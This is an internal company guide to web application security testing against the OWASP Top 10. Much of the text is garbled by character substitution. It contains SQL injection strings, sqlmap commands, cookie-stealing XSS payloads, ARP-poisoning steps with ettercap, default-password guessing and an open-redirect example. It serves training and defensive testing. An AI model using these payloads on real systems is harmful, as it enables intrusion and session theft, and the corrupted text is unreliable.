Security testing Owasp Top 10 guide

Document Management
Confidentiality
This is a Levi9 Restricted document. According to the Standards of Business Conduct, this document may not be shared outside Levi9 but may be published on the Levi9 ntranet !ithout further restrictions. This document may be shared !ith the customer, if an appropriate agreement for professional services e"ists.

Distribution List
To Company / Role ction! Due Date Telep"one / e#mail

* Action: Approve, Review, Inform, Other (Please specify)

Document $istory
%ersion Description Date ut"or

References
Source Date ut"or

#ersion $.%

&rint 'ate $( )an *%$+

&age * of ,%

Table of contents $ About -.AS& Top $%......................................................................................................... + $.$ A$ n/ection................................................................................................................... + $.$.$ 0anual inserting S1L n/ection string in the 2RL and fields...................................+ $.$.* Automated inserting S1L n/ection strings in the input fields..................................( $.* A* Cross3Site Scripting 45SS6.......................................................................................9 $.*.$ Reflected Cross Site Scripting 45SS6......................................................................9 $.*.* Stored Cross Site Scripting 45SS6..........................................................................9 Session........................................................................................................................ $% $.*., 7"amples for &ersistent 5SS Attac8.....................................................................$% $., A, Bro8en Authentication and Session 0anagement..................................................$, $.,.$ 0anual testing of Bro8en Authentication and Session 0anagement....................$, $.,.* Automated testing of Bro8en Authentication and Session 0anagement...............$, Logout and Bro!ser Cache 0anagement............................................................................$9 $.+ A+ nsecure 'irect -b/ect References........................................................................$: Attac8s on application platform ....................................................................................$9 Attac8s on other systems ............................................................................................$9 $.( A( Cross3Site Re;uest <orgery 4CSR<6......................................................................$9 Clic8/ac8ing Test &age ....................................................................................................*% $.= A= Security 0isconfiguration.......................................................................................*$ $.9 A9 nsecure Cryptographic Storage.............................................................................*$ $.: A: <ailure to Restrict 2RL Access..............................................................................** $.9 A9 nsufficient Transport Layer &rotection...................................................................** $.$% A$% 2nvalidated Redirects and <or!ards................................................................*+ * 'amn #ulnerable .eb App 4'#.A6..................................................................................*( , Appendi"............................................................................................................................ *: + Bibliography....................................................................................................................... ,%

#ersion $.%

&rint 'ate $( )an *%$+

&age , of ,%

bout O& S' Top 10

A$> n/ection A*> Cross3Site Scripting 45SS6 A,> Bro8en Authentication and Session 0anagement A+> nsecure 'irect -b/ect References A(> Cross3Site Re;uest <orgery 4CSR<6 A=> Security 0isconfiguration A9> nsecure Cryptographic Storage A:> <ailure to Restrict 2RL Access A9> nsufficient Transport Layer &rotection A$%> 2nvalidated Redirects and <or!ards

The -.AS& Top $% .eb Application Security Ris8s for *%$% are>

The list above represents the most !idespread vulnerabilities for *%$%. Testing !eb application against those -.AS& Top $% points could be performed manually or using penetration tools or scanners. t is the best to use combination of manual testing and using some of automated testing tools. There are a lot of free automated testing tools. This is the list of most popular> .ebScarab 4!eb scanner6 3 .ebScarab is a frame!or8 for analy?ing applications that communicate using the @TT& and @TT&S protocols. Bac8Trac8( 4distribution based on the 'ebian AB2CLinu" distribution aimed at digital forensics and penetration testing use6 -.AS& Live C' 4collects some of the best open source security pro/ects in a single environment 4Linu"66. -.AS& DA& 4penetration testing tool for finding vulnerabilities in !eb applications6

1(1

1 )n*ection

n/ection fla!s, such as S1L, -S, and L'A& in/ection, occur !hen untrusted data is sent to an interpreter as part of a command or ;uery. The attac8erEs hostile data can tric8 the interpreter into e"ecuting unintended commands or accessing unauthori?ed data. #ulnerability for in/ection could be tested on t!o !ays, using penetration tool or manually by inserting S1L n/ection string in the 2RL as parameter or by inserting in input or te"t field. There are a lot of S1L n/ection strings !hich can be used for attac8. 1(1(1 Manual inserting S+L )n*ection string in t"e ,RL and fields

Perform String SQL Injection <or e"ample>

S7L7CT F <R-0 2sers .@7R7 2sernameGH$H -R H$H G H$H AB' &ass!ordGH$H -R H$H G H$H
http>CCphase*relatieplanet.staging.levi9.comCrdIusernameG$HJ*%orJ*%H$HJ*%GJ*%H$Kpass!ordG$HJ*%or J*%H$HJ*%GJ*%H$

http>CCphase*relatieplanet.staging.levi9.comCrdIuserGF

#ersion $.%

&rint 'ate $( )an *%$+

&age + of ,%

7"ample $ nsert follo!ing S1L in/ection strings in username and pass!ord field and submit it. L orE$E G L$ H or HaHGHa f application is vulnerable for S1L in/ection, attac8er !ill be logged as first user !ho e"ists in the database. 7"ample * nsert follo!ing S1L in/ection strings in username field> L orE$E G L$M33 nsert anything in pass!ord field IidG3*( order by $% 1(1(utomated inserting S+L )n*ection strings in t"e input fields

<or automated testing S1L in/ection one of the best tools is 0antra. 0antra is one of the many Bac8Trac8( penetration tools. Also, there is a possibility to install 0antra as standalone application 4!ithout Bac8Trac8(6. Start 0antra standalone application, select ToolsCApplication Auditing, and choose NS1L n/ect 0eO. -pen sidebar and select !hich S1L in/ection sting you !ant to test on specific input field. Start test by pressing N7"ecuteO button. There is option to test all forms on the page !ith all attac8s or top attac8 by pressing NTest all forms !ith all attac8sO or NTest all forms !ith top attac8sO button. 0antra offer possibility to add some custom S1L in/ection strings. This can be done in -ptions section. Also, it is possible to import S1L in/ection strings from ."ml file.

#ersion $.%

&rint 'ate $( )an *%$+

&age ( of ,%

#ersion $.%

&rint 'ate $( )an *%$+

&age = of ,%

XML-Injection 50L in/ection is possible only if application relies on 50L 4stores information in an 50L 'B for instance6. Let us suppose !e have the follo!ing "ml DB file (information is stored in an XML) <?xml version="1.0" encoding="ISO??8859??1"?> <users> <user> <username>gandalf< username> <!ass"ord>#c$< !ass"ord> <userid>0< userid> <mail>gandalf%middleear&'.com< mail> < user> <user> <username>S&efan0< username> <!ass"ord>"1s$c< !ass"ord> <userid>500< userid> <mail>S&efan0%"'(sec.'mm< mail> < user> < users> Tool for testing 50L in/ection> 5&ath Blind 7"plorer 4http>CCcode.google.comCpC"path3blind3 e"plorerCdo!nloadsClist) Blind SQL injection .eb site might be vulnerable to blind S1L in/ection if id of the page is e"posed in the 2RL. Blind S1L n/ection is used !hen a !eb application is vulnerable to an S1L in/ection but the results of the in/ection are not visible to the attac8er. The page !ith the vulnerability may not

#ersion $.%

&rint 'ate $( )an *%$+

&age 9 of ,%

be one that displays data but !ill display differently depending on the results of a logical statement in/ected into the legitimate S1L statement called for that page. This type of attac8 can become time3intensive because a ne! statement must be crafted for each bit recovered. There are several tools that can automate these attac8s once the location of the vulnerability and the target information has been established. <irst thing is to chec8 is targeted page !ith id in the 2RL vulnerable or not> $. Ao to the targeted page i.e. http>CC!!!.fa8eboo8revie!er.comCsho!Revie!.phpI 'G(, <ollo!ing query
'5';

ill !e e"ecuted# SELECT * FROM bookreviews WHERE ID =

*. <rom !hich it !ould populate the revie! page !ith data from the revie! !ith ' G (, stored in the table boo8revie!s. The ;uery happens completely on the serverM the user does not 8no! the names of the database, table, or fields, nor does the user 8no! the ;uery string. The user only sees that the above 2RL returns a boo8 revie!. A hac8er can load the 2RLs http>CC!!!.fa8eboo8revie!er.comCsho!Revie!.phpI 'G( AB' $G$ and http>CC!!!.fa8eboo8revie!er.comCsho!Revie!.phpI 'G( AB' $G*, !hich may result in ;ueries>
SELECT * FROM bookreviews WHERE ID = '5' AND '1'='1'; SELECT * FROM bookreviews WHERE ID = '5' AND '1'=' ';

respectively. f the original revie! loads !ith the P$G$P 2RL and a blan8 or error page is returned from the P$G*P 2RL, the site is li8ely vulnerable to a S1L in/ection attac8. The hac8er may proceed !ith this ;uery string designed to reveal the version number of 0yS1L running on the server> http>CC!!!.fa8eboo8revie!er.comCsho!Revie!.phpI 'G( AB' substring4QQversion ,$,$6G+, !hich !ould sho! the boo8 revie! on a server running 0yS1L + and a blan8 or error page other!ise. The hac8er can continue to use code !ithin ;uery strings to glean more information from the server until another avenue of attac8 is discovered or his or her goals are achieved. So, the point is that !eb application does not return to attac8er any information after e"ecuting S1L ;ueries. Blind S1L in/ection is called NblindO because attac8er do not have any info about application and database, and attac8er try to guess user name and pass!ord by inserting malicious code using information obtained from error messages.$ $nion Query SQL Injection

Reference> http>CCen.!i8ipedia.orgC!i8iCS1LRin/ectionM http>CC!!!.securiteam.comCsecurityrevie!sC('&%B$&9=7.html #ersion $.% &rint 'ate $( )an *%$+ &age : of ,%

!""#$%%www&e'()#*e&+o)%#ro,-+"&#!#.i,=1/ ORDER 01 1/22 #3"!o4 s5*)(#&#3 2v 22-r*= !""#$%%1/&1&1&66%,vw(%v-*4er(bi*i"ies%s5*i 22-ser2(7e4"=S8LMA9 22,e*(3=1 22"i)eo-"=15 22re"ries= 22kee#2(*ive 22"!re(,s=5 22e"( 22b("+! 22,b)s=M3S8L 22os=Li4-' 22*eve*=5 22risk=6 22b(44er 22is2,b( 22,bs 22"(b*es 22"e+!4i5-e=0E:ST

1(1(-(1 1.2.1.1

- Cross#Site Scripting ./SS0

Reflected Cross Site Scripting ./SS0 an!al testin" of #ross$%ite %criptin" (&%%)

0anual testing of Cross3Site Scripting means that every input or te"t field or 2RL on !eb application should be tested for inserting some malicious script. Reflected Cross3site Scripting 45SS6 is another name for non3persistent 5SS, !here the attac8 doesnHt load !ith the vulnerable !eb application but is originated by the victim loading the offending 2R . n case of Bon3&ersistent attac8 or Reflected Cross Site Scripting, it re;uires a user to visit the specially crafted lin8 by the attac8er. .hen the user visits the lin8, the crafted code !ill get e"ecuted by the userEs bro!ser. <or e"ample> Attac8er created 2RL and sends it to the victim 4i.e. http>CCvisitme.com6, !hen victim clic8 on this lin8 malicious code !ill be e"ecuted and attac8er can steal session from victim. <or e"ample>
http>CCphase*relatieplanet.staging.levi9.comCrdIuserGSscriptTalert4$*,6SCscriptT http>CCphase*relatieplanet.staging.levi9.comCrdIuserGSscriptT!indo!.onload G function46 Uvar AllLin8sGdocument.get7lementsByTagBame4PaP6MAllLin8sV%W.hrefGPhttp>CCbade"ample.comCmalicious.e "ePM XSCscriptT 7nter follo!ing /avascript code in the input field> SscriptTalert4document.coo8ie6MSCscriptT and submit it to the server. This is a fe! e"amples of inserting 5SS into 2RL* http>CCphase*relatieplanet.staging.levi9.comCrdCsearchI actionGsounde"KfirstnameGSscriptTalert4document.coo8ie6SCscriptT http>CCphase*relatieplanet.staging.levi9.comCrdC?oe8enCuitgebreid3?oe8enCI actionGSscriptTalert4document.coo8ie6SCscriptT

1(-(-

Stored Cross Site Scripting ./SS0

Stored Cross3site Scripting 45SS6 is the most dangerous type of Cross Site Scripting. .eb applications that allo! users to store data are potentially e"posed to this type of attac8. This chapter illustrates e"amples of stored cross site scripting in/ection and related e"ploitation scenarios.

Reference> http>CCtheinsider.deep3ice.comCte"tsC"ssRe"posed.t"t &rint 'ate $( )an *%$+ &age 9 of ,%

#ersion $.%

n case of persistent attac8, the code in/ected by the attac8er !ill be stored in a secondary storage device 4mostly on a database6. Stored 5SS does not need a malicious lin8 to be e"ploited. A successful e"ploitation occurs !hen a user visits a page !ith a stored 5SS. The follo!ing phases relate to a typical stored 5SS attac8 scenario>

Attac8er stores malicious code into the vulnerable page 2ser authenticates in the application 2ser visits vulnerable page 0alicious code is e"ecuted by the userHs bro!ser

<or e"ample> Attac8er inserts some malicious code on the vulnerable page and save this. This malicious code is stored in the database. .hen some user visit attac8erEs page malicious code !ill be e"ecuted. Session @TT& protocol is a stateless protocol, !hich means, it !onEt maintain any state !ith regard to the re;uest and response. All re;uest and response are independent of each other. But most of the !eb applications donEt need this. -nce the user has authenticated himself, the !eb server should not as8 the usernameCpass!ord for the ne"t re;uest from the user. To do this, they need to maintain some 8ind of states bet!een the !eb3bro!ser and !eb3server !hich is done through the NSessionsO. .hen the user login for the first time, a session ' !ill be created by the !eb server and it !ill be sent to the !eb3bro!ser as Ncoo8ieO. The entire sub3se;uent re;uest to the !eb server !ill be based on the Nsession idO in the coo8ie. 1(-(1 23amples for 'ersistent /SS ttac4

This sample !eb application !eEve given belo! that demonstrates the persistent 5SS attac8 does the follo!ing> Ao to the some page !ith input or te"t fields, enter malicious code and save. 0alicious code sno! stored in the database.

#ersion $.%

&rint 'ate $( )an *%$+

&age $% of ,%

1.2.'.1 A!tomate( testin" of #ross$%ite %criptin" (&%%) Run 0antra N5SS meO tool in standalone application or run it in Bac8Trac8(. Select fields you !ant to test choose 5SS string and press 7"ecute button or /ust press NTest all forms !ith all attac8sO button to test all forms on the page !ith all 5SS strings defined in -ptions section. t is possible to add more 5SS strings in -ptions section.

#ersion $.%

&rint 'ate $( )an *%$+

&age $$ of ,%

#ersion $.%

&rint 'ate $( )an *%$+

&age $* of ,%

D%M !ased XSS fault The '-0, or 'ocument -b/ect 0odel is the structural format that may be used to represent documents in the bro!ser. The '-0 enables dynamic scripts such as )avaScript to reference components of the document such as a form field or a session coo8ie. .hen attac&er enter some img tag in t'e in(ut field and su!mit t'at scri(t) if a((lication is not secure t'an t'ere is (ossi!ility to deface e!site* (layout of t'e (age ill !e !ro&en) <or e"ample> find 2RL that point to the some image 4easiest !ay is to select image and use Ncopy lin8 locationO6 +img src,'tt(#--./0*.1*2*03/#4242-relatie(lanet-mem!erimages-t'!.*5P6 ) enter in t'e in(ut field and su!mit*

1(1
1(1(1

1 5ro4en ut"entication and Session Management

Manual testing of 5ro4en ut"entication and Session Management

Authentication and session management includes all aspects of handling user authentication and managing active sessions. Authentication is a critical aspect of this process, but even solid authentication mechanisms can be undermined by fla!ed credential management functions, including pass!ord change, forgot my pass!ordM remember my pass!ord, account update, and other related functions. Because N!al8 byO attac8s are li8ely for many !eb applications, all account management functions should re;uire reauthentication even if the user has a valid session id. 7"ample> SiteEs user should not be able to see protected content of the site if heCshe is not authori?ed to see it. So, user passes authentication, but if heCshe is not authori?ed to see something on the site, application should not allo! himCher to see this content. 2ser A have permission to see some image or document, but user B do not have that permission 4not logged in6, so if user A send 2RL !ith session ' to user B, heCshe should not be able to see it. .hat should be chec8edI This is the list> $. Are credentials al!ays protected !hen stored using hashing or encryptionI *. Can credentials be guessed or over!ritten through !ea8 account management functions 4e.g., account creation, change pass!ord, recover pass!ord, !ea8 session 's6I ,. Are session 's e"posed in the 2RL 4e.g., 2RL re!riting6I +. Are session 's vulnerable to session fi"ation attac8sI (. 'o session 's timeout and can users log outI =. Are session 's rotated after successful loginI 9. Are pass!ords, session 's, and other credentials sent only over TLS connectionsI 1(1(utomated testing of 5ro4en ut"entication and Session Management

<rom main menu select follo!ing>

#ersion $.%

&rint 'ate $( )an *%$+

&age $, of ,%

Bac8Trac8C&rivilege 7scalationCSniffersCBet!or8 SniffersCettercap3gt8 <ind etter.conf file, this file is located in etc folder YYetcYetter.conf. 7dit it, find Linu" section for NiptablesO in this file and remove sign Z in those t!o lines> ZredirRcommandRon G Piptables 3t nat 3A &R7R-2T BA 3i Jiface 3p tcp 33dport Jport 3/ R7' R7CT 33to3port JrportP ZredirRcommandRoff G Piptables 3t nat 3' &R7R-2T BA 3i Jiface 3p tcp 33dport Jport 3/ R7' R7CT 33to3port JrportP -pen ettercap3gt8, Clic8 on Sniff, choose 2nified sniffing, select Bet!or8 interface from the list 4e.g. eth$6 and clic8 -[ Ao to the @osts and clic8 on Scan for hosts, no! go to the @ost list select !anted host from the list ad clic8 on Add to Target $, select another and clic8 on Add to target * Choose 0itim from menu and clic8 on Arp poisoning, select Sniff remote connections.

Choose Start and clic8 on Start sniffing. To chec8 if the poisoning had success go to the &lugins and open 0anage the plugins <rom main menu select follo!ing> Bac8Trac8C&rivilege 7scalationC&ass!ord Atac8sCgt83hydra Bo!, -pen bro!ser on the victim machine 4machine from the host list that !as poisoned6 Default or guessa!le (dictionary) user account Try the follo!ing usernames 3 PadminP, PadministratorP, ProotP, PsystemP, PguestP, PoperatorP, or PsuperP. These are popular among system administrators and are often used. Additionally you could try P;aP, PtestP, Ptest$P, PtestingP and similar names. Attempt any combination of the above in both the username and the pass!ord fields. f the application is vulnerable to username enumeration, and you successfully manage to identify any of the above usernames, attempt pass!ords in a similar manner. n addition try an empty pass!ord or one of the follo!ing Ppass!ordP, Ppass$*,P, Ppass!ord$*,P, PadminP, or PguestP !ith the above accounts or any other enumerated accounts. <urther permutations of the above can also be attempted. f these pass!ords fail, it may be !orth using a common username and pass!ord list and attempting multiple re;uests against the application. This can, of course, be scripted to save time., Brute 7orce 'ictionary Attac8 'ictionary3based attac8s consist of automated scripts and tools that !ill try to guess usernames and pass!ords from a dictionary file. A dictionary file can be tuned and compiled to cover !ords probably used by the o!ner of the account that a malicious user is going to attac8. The attac8er can gather information 4via activeCpassive reconnaissance, competitive intelligence, dumpster diving, social engineering6 to understand the user, or build a list of all uni;ue !ords available on the !ebsite.
,

Reference> https>CC!!!.o!asp.orgCinde".phpCTestingRforR'efaultRorRAuessableR2serRAccountR J*:-.AS&3AT3%%,J*9

#ersion $.%

&rint 'ate $( )an *%$+

&age $+ of ,%

Start -.AS& DA& tool Select Brute <orce, select site and choose directory3list file from dropdo!n bo" and press &lay. t is possible to create your o!n directory3list By(assing aut'entication sc'ema

'irect page re;uest 4forced bro!sing6 &arameter 0odification Session ' &rediction

Direct page re6uest .forced browsing0 f a !eb application implements access control only on the login page, the authentication schema could be bypassed. <or e"ample, if a user directly re;uests a different page via forced bro!sing, that page may not chec8 the credentials of the user before granting access. Attempt to directly access a protected page through the address bar in your bro!ser to test using this method. Try !ith this> http>CCsomesite.comCusersCAdministrator 'arameter Modification f user is not authenticated parameter in the 2RL !ill be> http>CCsomesiteChomepage./spI authenticatedGno Type this in bro!ser> http>CCsomesiteChomepage./spIauthenticatedGyes Session )D 'rediction 0any !eb applications manage authentication using session identification values 4S7SS -B '6. Therefore, if session ' generation is predictable, a malicious user could be able to find a valid session ' and gain unauthori?ed access to the application, impersonating a previously authenticated user. n the follo!ing figure, values inside coo8ies increase linearly, so it could be easy for an attac8er to guess a valid session '.

#ersion $.%

&rint 'ate $( )an *%$+

&age $( of ,%

This is not correct, distribution of coo8ies over time must be dispersed, if not, there is possibility t'at attac&er (redict session ID*

To chec8 this, start .ebScarab, open Session ID 8nalysis ta!) Select 9equest) enter num!er of Sam(les and (ress :est* ;lic& on 7etc' !utton) and after t'at go to t'e 8nalysis ta!* Select session identifier* 9e(eat t'is action for different requests in order to get diagram for coo&ie <alues o<er time*

#ersion $.%

&rint 'ate $( )an *%$+

&age $= of ,%

Logout and Bro ser ;ac'e Management n this testcase, !e chec8 that the logout function is properly implemented, and that it is not possible to NreuseO a session after logout. .e also chec8 that the application automatically logs out a user !hen that user has been idle for a certain amount of time, and that no sensitive data remains stored in the bro!ser cache. %nly one coo&ie e"ists to store session info Chec8 follo!ing# sessions ' K coo8ies a coo8ie is data stored on the client 4recommendation is session coo8ie instead of persistent coo8ie6 !hen the bro!ser is closed, temporary coo8ies 4session coo8ies6 should be erased a sessionHs data is stored on the server 4only $ session per client6 the only data the client stores is a coo8ie holding a uni;ue session ' on each page re;uest, the client sends its session ' coo8ie, and the server uses this to find and retrieve the clientHs session data

;'ec& reset (ass ord

'assword Reset

The first step is to chec8 !hether secret ;uestions are used. Sending the pass!ord 4or a pass!ord reset lin86 to the user email address !ithout first as8ing for a secret ;uestion means relying $%%J on the security of that email address, !hich is not suitable if the application needs a high level of security. Chec8 are there multiple ;uestions offeredI Chec8 does the pass!ord reset allo! unlimited attemptsI Chec8 does pass!ord3reset tool display the old pass!ordI Chec8 does it email the pass!ord to some pre3defined email addressI 'isplay a Captcha code, after successful verification of username andCor Security 1uestion Send a lin8 to the userEs registered email address. The lin8 should have random to8en associated !ith it. :'e lin& s'ould !e s'ort-li<ed) one time use only) and SSL ena!led* %nce t'e user=s resets t'e (ass ord) t'e lin& s'ould no longer !e usa!le*

'assword Remember

f pass!ord is stored in a permanent coo8ie than the pass!ord must be hashedCencrypted and not sent in the clear. ;'ec& if t'e session is refres'ed

#ersion $.%

&rint 'ate $( )an *%$+

&age $9 of ,%

After 8illing bro!ser or deleting coo8ies and cache in bro!ser, current session must be terminated, if not) t'an e 'a<e security issue*

1(7

7 )nsecure Direct Ob*ect References

The best !ay to find out if an application is vulnerable to insecure direct ob/ect references is to verify that all ob/ect references have appropriate defenses. To achieve this, consider> $. <or direct references to restricted resources, the application needs to verify the user is authori?ed to access the e"act resource they have re;uested. *. f the reference is an indirect reference, the mapping to the direct reference must be limited to values authori?ed for the current user. <or e"ample> 2ser A is authenticated on the site but doesnEt have permission to see some parts of the site. So, !hen user A try to access to some forbidden area, application must chec8 is heCshe authori?ed to see hidden content. f heCshe is not authori?ed, application must disenable himCher to see hidden content. Attac8er, !ho is an authori?ed system user, simply changes a parameter value that directly refers to a system ob/ect to another ob/ect the user isnEt authori?ed for. This behavior must be disenabling. The best !ay for testing this type of vulnerability is manually testing or code revie!. Im(ro(er Limitation of a Pat'name to a 9estricted Directory (>Pat' :ra<ersal>) Start -.AS& DA& tool (ma&e sure t'at (ro"y is configured in t'e !ro ser)* ?a<igate t'roug' site) all traffic goes <ia (ro"y and %@8SP A8P interce(ts all requests and res(onses* 7rom t'e tree select 'ic' (age and 'ic' met'od you ant to test (6B: or P%S:)* 7rom t'e 9equest ta! select $9L) rig't clic&) and clic& at C7uDD***E 7rom 7uDD ;ategory c'oose Pat' :ra<ersal and clic& at 7uDD !utton to start testing*

#ersion $.%

&rint 'ate $( )an *%$+

&age $: of ,%

$nrestricted $(load of 7ile

it' Dangerous :y(e

The e! a((lication allo s t'e attac&er to u(load or transfer files of dangerous ty(es t'at can !e automatically (rocessed it'in t'e (roduct>s en<ironment*
ttac4s on application platform

Chec8 follo!ing>

2pload ./sp file into !eb tree 3 /sp code e"ecuted as !eb user 2pload .gif to be resi?ed 3 image library fla! e"ploited 2pload huge files 3 file space denial of service 2pload file using malicious path or name 3 over!rite critical file 2pload file containing personal data 3 other users access it 2pload file containing PtagsP 3 tags get e"ecuted as part of being PincludedP in a !eb page
ttac4s on ot"er systems

Chec8 follo!ing>

2pload .e"e file into !eb tree 3 victims do!nload tro/aned e"ecutable 2pload virus infected file 3 victimsH machines infected 2pload .html file containing script 3 victim e"periences Cross3site Scripting 45SS6

1(8

8 Cross#Site Re6uest 9orgery .CSR90

Besides 5SS and n/ection, CSR< is most common vulnerability on the !eb sites. Consider anyone !ho can tric8 your users into submitting a re;uest to your !ebsite. Any !ebsite or other @T0L feed that your user access could do this. <or e"ample> Attac8er creates forged @TT& re;uests and tric8s a victim into submitting them via image tags, 5SS, or numerous other techni;ues. f the user is authenticated, the attac8 succeeds. @o! to create forged page !ith image tagI <irst, do!nload &i\ata csrf tool from http>CCcode.google.comCpCpinata3csrf3toolCdo!nloadsClist $. nstall &ython *. 2n?ip pi\ata tool ,. Start some scanner tool 4.ebScarab, &aros or something similar6. .ith this tool attac8er intercept @TT& A7T re;uest and this re;uest !ill be used for creating forged page !ith img tag. +. Ao to the vulnerable site and perform some action 4 n this case attac8er6 (. Copy @TT& re;uest =. &aste it to CSR<Body.t"t file

#ersion $.%

&rint 'ate $( )an *%$+

&age $9 of ,%

9. Run command line and go to the &inata folder and run pi\ata.py file

:. Chec8 folder !here you un?ip &inata tool, there should be created an .html file 9. This html file has in the body img tag !ith malicious code in it.

$%. Run this html code in ne! bro!ser, if application is not safe every time !hen user reload page or clic8 on lin8 !ho leads to the malicious page code !ill be e"ecuted, because bro!ser automatically start loading images on the page. $$. f application is safe related CSR< attac8 nothing !ill happen. ;lic&jac&ing
Clic4*ac4ing Test 'age

To test !hether a site is vulnerable to clic8/ac8ing, create an @T0L page similar to the follo!ing, changing the 2RL highlighted in R7' to point to your target site> <'&ml> <'ead> <&i&le>)lic*+ac* &es& !age< &i&le> < 'ead> <,od(> <!>-ou.ve ,een clic*+ac*ed#< !> <iframe sand,ox="allo"/scri!&s allo"/forms" src="'&&!0 local'os&08080" s&(le=""id&'010012'eig'&0901">< iframe> < ,od(> < '&ml> f you see the te"t N]ouEve been clic8/ac8ed^O at the top of the page, your site is vulnerable. .ith a clic8/ac8ing defense script installed, your site should brea8 out of the site that is

#ersion $.%

&rint 'ate $( )an *%$+

&age *% of ,%

framing it and that te"t !ill not be displayed. f the userEs bro!ser has )avascript turned off, the target site should not display at all.

1(:

: Security Misconfiguration

:esting for F::P Met'ods and XS: 'irectory listing is not disabled on your server. Attac8er discovers he can find all files on your server by simply listing the directories. Attac8er finds and do!nloads all your compiled )ava classes, !hich he reverses to get all your custom code. @e then find a serious access control fla! in your application. The methods that should be disabled are the follo!ing>

&2T> This method allo!s a client to upload ne! files on the !eb server. An attac8er can e"ploit it by uploading malicious files 4e.g.> an asp file that e"ecutes commands by invo8ing cmd.e"e6, or by simply using the victimHs server as a file repository '7L7T7> This method allo!s a client to delete a file on the !eb server. An attac8er can e"ploit it as a very simple and direct !ay to deface a !eb site or to mount a 'oS attac8 C-BB7CT> This method could allo! a client to use the !eb server as a pro"y TRAC7> This method simply echoes bac8 to the client !hatever string has been sent to the server, and is used mainly for debugging purposes. This method, originally assumed harmless, can be used to mount an attac8 8no!n as Cross Site Tracing, !hich has been discovered by )eremiah Arossman 4see lin8s at the bottom of the page6

1(;

; )nsecure Cryptograp"ic Storage

<or e"ample, pass!ords, credit cards, health records, and personal information should be encrypted. <or all such data, ensure> $. t is encrypted every!here it is stored long term, particularly in bac8ups of this data. *. -nly authori?ed users can access decrypted copies of the data 4i.e., access control _ See A+ and A:6. ,. A strong standard encryption algorithm is used. +. A strong 8ey is generated, protected from unauthori?ed access, and 8ey change is planned for. ;'ec& (ass ord 'as'ed $. @o! to chec8 are pass!ords, credit cards and other personal data properly stored in the database _ go to the database and find table !ith pass!ords, credit cards and other personal data. *. Copy hash value ,. Start some program i.e. 4http>CC!!!.sha$3loo8up.comC6 to search reverse value from copied hash value.

#ersion $.%

&rint 'ate $( )an *%$+

&age *$ of ,%

+.

f strong encryption algorithm is used, attac8er should not be able to see reverse value from copied hash value.

1(<

< 9ailure to Restrict ,RL ccess

Attac8er, !ho is an authori?ed system user, simply changes the 2RL to a privileged page. s access grantedI Anonymous users could access private pages that arenEt protected. f user has no privilege to see some pages on the site, system should prevent himCher to do that by typing 2RL address of that page in bro!ser.

1(=

= )nsufficient Transport Layer 'rotection

Transport Layer Security 4TLS6 and its predecessor, Secure Soc8ets Layer 4SSL6, are cryptographic protocols that provide communication security over the nternet. TLS and SSL encrypt the segments of net!or8 connections at the Application Layer for the Transport Layer, using asymmetric cryptography for 8ey e"change, symmetric encryption for confidentiality, and message authentication codes for message integrity. SSL 8lgorit'ms <or e"ample> To chec8 SSL algorithms on server should be used NsslscanO tool !hich is part of Bac8Trac8 distribution. Run Bac8Trac8( <rom 0ain menu select nformation AatheringCBet!or8 AnalysisC Service <ingerprintingCsslscan 7nter server & address you !ant to test and press enter

#ersion $.%

&rint 'ate $( )an *%$+

&age ** of ,%

This tool help testers to chec8 !hich if !eb server run latest SSL version 4version ,6 or TLS version $. There are still some outdated servers running SSL version *. nformation AatheringCBet!or8 AnalysisC dentify Live @ostsCnmap SSL Gey Lengt's Auidelines for SSL Gey lengt's are (resented in ta!le+ belo!# Certificate e3piry date
On or before ,$ 'ecember *%$, fter ,$st 'ecember *%$,
st

Minimum RS public 4ey lengt"

$%*+ *%+:

Ste(s to c'ec& 9S8 Pu!lic Gey# Run Bac8Trac8( <rom 0ain menu select nformation AatheringCBet!or8 AnalysisC Service <ingerprintingCsslscan 7nter server & address you !ant to test and press enter

Digital ;ertificate Halidity Steps to chec8 RSA &ublic [ey> Run Bac8Trac8( <rom 0ain menu select nformation AatheringCBet!or8 AnalysisC Service <ingerprintingCsslscan 7nter server & address you !ant to test and press enter

http>CCne!s.netcraft.comCarchivesC*%$*C%9C$%Cminimum3rsa3public38ey3lengths3guidelines3or3 rules.html #ersion $.% &rint 'ate $( )an *%$+ &age *, of ,%

1(10 8.2 $n<alidated 9edirects and 7or ards

f application has redirect page or application uses for!ard to route re;uests bet!een different parts of the site, that is potentialy dangerous, because attac8er may e"ploit redirect or for!ard to redirect users to the some malicious site by entering address of malicious site in the 2RL address. <or e"ample> http>CC!!!.e"ample.comCredirect./spIurlGevil.com CreateCuse a spider to cra!l your o!n site Loo8 at the logs for redirects ,%%3series statuses ,%*K,%9 ,%*Gold3schoolpagemoved ,%9Gproper redirection. o o o o o Try to change the 2RL by hand. Try to brute3force change it via an @TT& re3!riter. f either !or8s, you have a vulnerability. 0odify the page to hard3code the destination. f that isnHt possible, only allo! the user to choose from a list.

#ersion $.%

&rint 'ate $( )an *%$+

&age *+ of ,%

- Damn %ulnerable &eb pp .D%& 0

'amn #ulnerable .eb App 4'#.A6 is a &@&C0yS1L !eb application that is damn vulnerable. ts main goals are to be an aid for security professionals to test their s8ills and tools in a legal environment, help !eb developers better understand the processes of securing !eb applications and aid teachersCstudents to teachClearn !eb application security in a class room environment. This !eb application is designed only for security testing purposes. 'o!nload and install 5A0&& from http>CC!!!.apachefriends.orgCenC"ampp3!indo!s.html 'o!nload '#.A from http>CC!!!.dv!a.co.u8 Simply un?ip dv!a.?ip, place the un?ipped files in your public html folder, and then point your bro!ser to http>CC$*9.%.%.$Cdv!aCinde".php. Application !ill be accessible only on local environment, if you !ant to access it from other machine edit .htaccess file and change this section Z Limit access to localhost Z Limit access to localhost SLimit A7T &-ST &2TT order deny,allo! deny from all allo! from $*9.%.%.$ SCLimitT to> Z Limit access to localhost SLimit A7T &-ST &2TT order deny,allo! allo! from all SCLimitT Set database credentials in CconfigCconfig.inc.php `R'#.AV HdbRuserH W G HyourRdatabaseRusernameHM 4in my case LrootE6 `R'#.AV HdbRpass!ordH W G HyourRdatabaseRpass!ordHM 4in my case LrootE6 `R'#.AV HdbRdatabaseH W G Hdv!aHM n '#.A application username and pass!ord are stored in Ndv!aO database in the table named NusersO. SQL injection Simply stated, S1L in/ection vulnerabilities are caused by soft!are applications that accept data from an untrusted source 4internet users6, fail to properly validate and saniti?e the data, and subse;uently use that data to dynamically construct an S1L ;uery to the database bac8ing that application. <or e"ample, imagine a simple application that ta8es inputs of a username and pass!ord. t may ultimately process this input in an S1L statement of the form string ;uery G PS7L7CT F <R-0 users .@7R7 username G PHP a username a PH AB' pass!ord G HP a pass!ord a PHIJ Since t'is query is constructed !y concatenating an in(ut string directly from 